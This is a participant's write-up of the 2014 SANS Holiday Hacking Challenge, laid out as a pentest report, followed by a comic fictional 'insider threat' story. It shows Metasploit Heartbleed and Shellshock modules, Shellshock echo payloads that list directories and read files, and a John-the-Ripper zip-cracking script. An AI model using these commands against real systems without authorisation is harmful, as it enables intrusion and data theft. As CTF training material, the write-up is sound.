“a christmas hacking carol” -...

SANS Holiday Hacking Challenge 2014

“A Christmas Hacking Carol”

Report Created: Sunday, January 4, 2015

Suave Security Web: http://www.SuaveSecurity.com E-mail: [email protected] Office: +1 641-715-3900 ext. 556377#

http://www.suavesecurity.com/

mailto:[email protected]


Table of Contents

Executive Summary 1

Attack Narrative 2

The Ghost of Hacking Past 2

Task #1: Time to say hello to Eliza 2

Task #2: Surf the Internet together 3

The Ghost of Hacking Present 4

Task #1: Heartbleed 4

Task #2: Shellshock 5

The Ghost of Hacking Future 6

Task #1: Analyze hhusb.dd.bin 6

Task #2: Analyze LetterFromJackToChuck.doc 6

Task #3: Analyze hh2014-chat.pcapng 8

Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip 9

Task #5: Analyze Tiny_Tom_Crutches_Final.jpg 11

Conclusion 12

The Real Story 13


Written By: Joshua Tomkiel Copyright 2014 Page 1 of 17

Executive Summary Suave Security took on the task of identifying what steps Scrooge went through in order to obtain 7 secret messages. We had Scrooge’s consent to investigate the following IP addresses:

173.255.233.59 23.239.15.124

o (http://www.scrooge-and-marley.com) ports 80 / 443 only Efforts were taken to provide as much detail as possible so that the steps could be easily repeatable. Throughout the investigation we discovered evidence that led us to question a Mr. Bob Cratchit. The story he provided to us can be found in the “Real Story” section at the bottom of this report. We have yet to go to the authorities with this information.

http://www.scrooge-and-marley.com/



Attack Narrative

The Ghost of Hacking Past The Ghost of Hacking Past, Mr. Alan Turing, gave this hint to Scrooge:

“Before I depart, I’d like to introduce you to an old friend of mine. She’s at 173.255.233.59 and has an important message to share with you, Scrooge. Feel free to connect with her, surf the Internet together, and see if you can discover her secret.”

Task #1: Time to say hello to Eliza

First, I ran a port scan to see what services were running: root@kali:~# nmap 173.255.233.59 -A -T4 -p 1-65535

The high port, 31124 seems interesting, lets see if I can get any banner information: root@kali:~#nc 173.255.233.59 31124

Here is Eliza. She’s a chat bot that responds to keywords such as “turing”, “turing machine”, “secret”, and “enigma”. If you type “secret” or “enigma” 3 times, you’ll get the next tip. But the most interesting trigger of all was the “surf to” command. Time to dig deeper.



Task #2: Surf the Internet together Eliza holds a secret. In order to discover it, I had to “surf the Internet with her.” I spun up a virtual Ubuntu server instance on Amazon’s EC2 free hosting tier, installed Apache and setup a test page. I then issued the following command to Eliza: “surf to http://54.68.208.14/index.html”

My basic website on Amazon EC2

I was also tailing the Apache access.log file at the same time:

tail –f /var/log/apache2/access.log The following entry appeared in the log: 173.255.233.59 - - [28/Dec/2014:14:35:44 +0000] "GET /index.html HTTP/1.1"

200 283 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me

by surprise with great frequency. -Alan Turing""

Initially I thought that I could use her as a proxy but I was looking into it too much. After hours of attempting different ways to get her to actually go to a URL, I ultimately told her what she was asking for.

Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing"



The Ghost of Hacking Present The Ghost of Hacking Present, Johnny Long, gave this hint to Scrooge:

“I've magically introduced two special secrets on your very own company website, www.scrooge-and-marley.com. Those secrets should shock your heart, teaching you important lessons for all time."

http://www.scrooge-and-marley.com is vulnerable to Shellshock and Heartbleed.

Task #1: Heartbleed root@kali:~#use auxiliary/scanner/ssl/openssl_heartbleed

Data leaked: 0for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2ek

Website Secret #1: Hacking can be noble.



Task #2: Shellshock root@kali:~#use auxiliary/scanner/http/apache_mod_cgi_bash_env

This was challenging since only ECHO and PWD commands received responses. I had to figure out within ECHO how to change directories, print the current directory, distinguish files from directories and finally, read the contents of a file. Read the secret file: echo $(cd /; pwd; while read line; do echo $line; done <secret)

Show only directories: echo $(cd /; pwd; for f in */; do echo "$f"; done)

Changing directories and list current directory: echo $(cd ..; cd ..; cd ..; pwd; for f in *; do echo "$f"; done)

Website Secret #2: Use your skills for good.



The Ghost of Hacking Future The Ghost of Hacking Future left Scrooge without any hints:

“It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. That hand bore a device the Ghoul proffered to Scrooge, a single USB thumb drive bearing untold secret horrors.”

Task #1: Analyze hhusb.dd.bin I ran strings on the .bin file to see if there was anything that jumped out at me. After parsing through the entire print out, I attempted to mount the .bin file by changing the file extension to .iso. However, not all files were displayed:

Extracting the .bin file with 7-ZIP on a Windows VM showed everything I needed and more:

Task #2: Analyze LetterFromJackToChuck.doc



I transferred the extracted folder back to my Kali VM and ran strings on the Word document: strings -16 LetterFromJackToChuck.doc | uniq

The secret appeared at the bottom of the file:

USB Secret #1: Your demise is a source of mirth.



Task #3: Analyze hh2014-chat.pcapng I ran strings on the PCAPNG file and found a message with a Base64 encoding string:

"I've just told our children about Mr. Scrooge's death, and all of their faces are brighter for it. We now have a very happy house. I so love you." VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==

Decoded via command line:

USB Secret #2: Your demise is a source of relief. I also uploaded the file to http://pcapng.com/. This site was able to display the Base64 encoded string and highlighted an interesting URL:

The URL also sticks out when greping for anything that starts with http, which will come in handy later… strings -16 hh2014-chat.pcapng | uniq | grep http

Small sample of output: Location: http://10.10.10.1:1780/InternetGatewayDevice.xml

Location: http://10.10.10.1/HNAP1/

Location: http://10.10.10.1/HNAP1/

Referer: http://chat.scrooge-and-marley.com/



https://code.google.com/p/f5-steganography/




http://pcapng.com/



Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip The zip file was password protected. I ran CeWL on scrooge-and-marley.com to create a wordlist based on a tip by the Ghost of Hacking past and a tweet:

Source: https://twitter.com/pentesttips/status/544869613662507008

cewl www.scrooge-and-marley.com -w scrooge-and-marley-wordlist.txt

I used the wordlist and the script below to brute force the zip file using John: http://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/ Code:

#!/bin/bash

echo "ZIP-JTR Decrypt Script";

if [ $# -ne 2 ]

then

echo "Usage $0 <zipfile> <wordlist>";

exit;

fi

unzip -l $1

for i in $(john --wordlist=$2 --rules --stdout)

do

echo -ne "\rtrying \"$i\" "

unzip -o -P $i $1 >/dev/null 2>&1

STATUS=$?

if [ $STATUS -eq 0 ]; then

echo -e "\nArchive password is: \"$i\""

break

fi

done

./zip-jtr.sh hh2014-chat.pcapng_Bed_Curtains.zip scrooge-and-marley-

wordlist.txt

Archive password is: "shambolic" Ran strings on the extracted the image “Bed_Curtains.png”:

https://twitter.com/pentesttips/status/544869613662507008

http://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/



USB Secret #3: Your demise is a source of gain for others.



Task #5: Analyze Tiny_Tom_Crutches_Final.jpg Inside the extracted .bin, there was a folder named [DELETED]. Inside that folder, was an image named “Tiny_Tom_Crutches_Final.jpg”.

Using the F5 steganography tool found from the link found in PCAP file (https://code.google.com/p/f5-steganography/) I was able to extract the final USB Secret: java -jar f5.jar x -e secret.txt Tiny_Tom_Crutches_Final.jpg

USB Secret #4: You can prevent much grief and cause much joy.

Hack for good, not evil or greed.

https://code.google.com/p/f5-steganography/



Conclusion The challenges that Scrooge had to overcome in order to obtain the secret messages ranged from petty personal attacks (e.g., chats purposely left within a packet capture for him to find, stating how happy people are now that he’s dead) to downright dangerous remotely accessible and publicly disclosed exploits which could severely damage his company and reputation if left unmitigated (Heartbleed and Shellshock). Yes, these, along with the rest of the challenges covered within this report could have been introduced by three “spirits” as depicted in “A Christmas Hacking Carol” story. However, I would like to propose an alternate scenario: a more realistic explanation as to what actually occurred to Scrooge that Christmas Eve. Evidence has been discovered proving that Scrooge fell victim to an often-overlooked threat that is all too common today, the disgruntled employee, otherwise known as the "insider threat."



The Real Story Bob Cratchit had worked alongside his wife, Lynn, under Scrooge’s unforgiving iron fist for many years. Although not directly mentioned in “A Christmas Hacking Carol” story, Bob was merely an apprentice to Scrooge and eager to learn as much as he could about anything security related. Bob had a curious mind and when he was not reading up on the latest exploits and industry news, he would be working in his home lab to develop his own 0-day exploits. Bob’s desk was in the back far corner behind his wife in the Secret Room connected to Scrooge’s Main Laboratory. Bob was fascinated by genealogy and had been known to brag about his relation to Dr. Alan Mathison Turing from time to time. One day, Bob asked Scrooge for professional training to further enhance his exploit development skills. Just like coal for the fire, training costs money and Scrooge wasn’t about to pay a penny! He would respond to any training requests with “Bah, Humbug! Just YouTube it!” Alas, Bob knew that YouTube was no match for the high quality, on-demand training that the SANS Institute could offer. Defeated and discouraged, Bob sulked back to his desk. He knew that without additional training, he could never hope to compete with the likes of Scrooge. Scrooge had made too many powerful connections during his years of exploit pedaling for Bob to challenge him straight on. Let’s just say Scrooge knew some people who could make Bob “disappear”. If Bob were to surpass Scrooge, he would have to have to bring him down to his level. Bob surmised a plan to do just that. He was going to affect Scrooge in such a way that would make him open to supporting professional growth and promote a more positive work environment, or he would bring down the company altogether. It was all going to go down tomorrow, on Christmas Eve. Much like many unmarried lonely men in their 50’s, Scrooge sought comfort from a bottle during the holiday season. Bob knew this and used it to his advantage. He planned to spike Scrooge’s drink with a powerful hallucinogen called Dimethyltryptamine (DTM), when taken orally has a 90 – 125 minute delay before the effects start kicking in (according to Wikipedia). Later that afternoon while Scrooge was busy talking with his nephew, who stopped by the Main Laboratory unannounced, Bob capitalized on the moment to add the liquid DMT into Scrooge’s cup. No one was the wiser. After Scrooge dismissed his cheerful nephew, he went back to his desk and continued to drink. Phase 1 was now complete. The time was approaching 5:00pm and the business day was coming to a close. Bob placed his hand in his pocket, ensuring that he was still in possession of two small USB flash drives. One was going to be used to plant malware on Scrooge’s MacBook. The other was to be used to attack Scrooge on an emotional level during the final phase of his plan. Scrooge left his MacBook unattended and unlocked as he made some notes in his business ledger. Bob moved quickly into action. Quietly, he crouched down and slipped in a USB flash drive that contained custom malware he’d written specifically for this moment. Within a few seconds, the payload was executed and a backdoor was established to Bob’s C&C server. This was insurance, just in case things didn’t go as planned.



Exhibit A: A photo taken by Mrs. Cratchit the exact moment Bob Cratchit infected Scrooge’s MacBook with custom malware while his back was turned. This was posted on Twitter via

Mrs.Cratchit’s account: #Brag #MyManProvides #MacsDontGetViruses With Scrooge still distracted, Bob connected via SSH with Scrooge’s stored credentials to the production webserver hosting scrooge-and-marley.com (23.239.15.124). Then, he downgraded the installed versions of Bash and OpenSSL, making the server vulnerable to Shellshock and Heartbleed. He had already setup a separate server hosting an Eliza chat bot to pay homage to his distant cousin, Dr. Alan Mathison Turing. Phase 2 was complete. Moving on to phase 3, Bob had to make Scrooge’s old exploit machine, Marley, look like it was back online. Bob located the dusty old server in the Server Room. He noticed that the Ethernet cable had been crimped by hand and a few of the copper wires were not pushed all the way in to the RJ45 connector. “Cheap ol’ Scrooge. Couldn’t even spring for some inexpensive cables from monoprice.com.” Bob muttered to himself. He replaced the cable with a new one and saw the LED lights start flashing on the NIC. “Layer 1 of the OSI model is so often overlooked.” Bob previously had been granted SSH access to this server and had root privileges on this box. He quickly connected and customized the MOTD text to display a cryptic message for Scrooge when he logged in next time. All that was left was to play the waiting game. He knew Scrooge was going to run his weekly internal vulnerability scan shortly. Bob connected his laptop to one of the SPAN ports on the switch and proceeded to sniff the traffic with WireShark. Patiently, he waited until he saw the SSH connection from the source of Scrooge’s laptop IP to the destination of Marley’s server IP. An hour passed



by, then it happened! There was the traffic he’d been waiting for! He gave it another 15 seconds, enough time for scrooge to read the message, and then abruptly powered down Marley. Moments later, Scrooge’s footsteps could be heard as he ran towards the Server Room. Bob closed his laptop and slid behind one of the server racks. It was evident that the effects of the hallucinogen had started to take their toll on Scrooge. Scrooge stumbled approaching the Server Room. Bob witnessed Scrooge wobble in the doorway and prop himself up against the door, struggling to maintain his balance. Scrooge stared hard into the room, began to recoil in horror, waved his hands in the air, screamed and ran out the door towards his bedroom. “Well, that was weird.” Bob thought to himself. Most importantly, phase 3 was complete. Phase 4 of the plan was perhaps the most risky of all. Bob was going to actually interact with Scrooge. Bob laid out three outfits in the Back Office. Each was to present a different message and challenge to Scrooge. The plan went better than Bob could have ever imagined, infinitely better! Scrooge was out of his mind the entire time due to the hallucinogen. It took all Bob had to maintain composure and not burst out laughing as Scrooge believed every word he said. Bob introduced himself as “The Ghost of Hacking Past - Dr. Alan Turing”, “The Ghost of Hacking Present - Johnny Long”, and the “Ghost of Hacking Future” which was really just a big Grim Reaper costume he had from last Halloween. Scrooge was a changed man after the experience, paying for training whenever it was requested! Scrooge went on to tell the story of what happened to him that night to anyone that would listen. Previously, only Mr. and Mrs. Cratchit knew the truth of what happened that night, and now you do too. In closing, remember that there will always be new vulnerabilities with nicknames sprawled across the headlines. However, I implore you to not forget about the threats that may be already inside your organization, purely waiting for the appropriate moment to strike.

“a christmas hacking carol” -...

Documents